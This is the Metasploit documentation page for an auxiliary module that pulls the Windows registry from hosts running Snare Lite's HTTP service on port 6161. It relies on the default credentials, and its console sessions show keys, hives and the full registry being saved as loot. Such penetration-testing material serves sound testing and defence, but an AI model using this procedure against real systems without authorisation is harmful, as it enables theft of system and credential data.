metasploit-framework/documentation/modules/auxiliary/gather/snare_registry.md

4.2 KiB

Description

This module uses the Registry Dump feature of the Snare Lite for Windows HTTP service on 6161/TCP to retrieve the Windows registry. The Registry Dump functionality is unavailable in Snare Enterprise.

Note: The Registry Dump functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.

Vulnerable Application

SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.

This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.

Snare Lite for Windows is no longer supported, however a free trial is available from the Snare Alliance website.

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/gather/snare_registry
  3. Do: set rhost [IP]
  4. Do: set HttpUsername [USERNAME]
  5. Do: set HttpPassword [PASSWORD]
  6. Do: run
  7. You should get a copy of HKLM\HARDWARE\DESCRIPTION\System from the remote Windows system

Options

HttpUsername

The username for Snare remote access (default: snare).

HttpPassword

The password for Snare remote access (default: blank).

REG_DUMP_KEY

Retrieve the specified registry key and all sub-keys.

REG_DUMP_ALL

Retrieve the entire Windows registry.

TIMEOUT

Timeout in seconds for downloading each registry key/hive.

Scenarios

Retrieve a specific registry key:

msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
[*] Auxiliary module execution completed

Retrieve an entire hive:

msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
REG_DUMP_KEY => HKLM
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
[*] Auxiliary module execution completed

Retrieve the entire registry:

msf auxiliary(snare_registry) > set REG_DUMP_ALL true
REG_DUMP_ALL => true
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
[*] Auxiliary module execution completed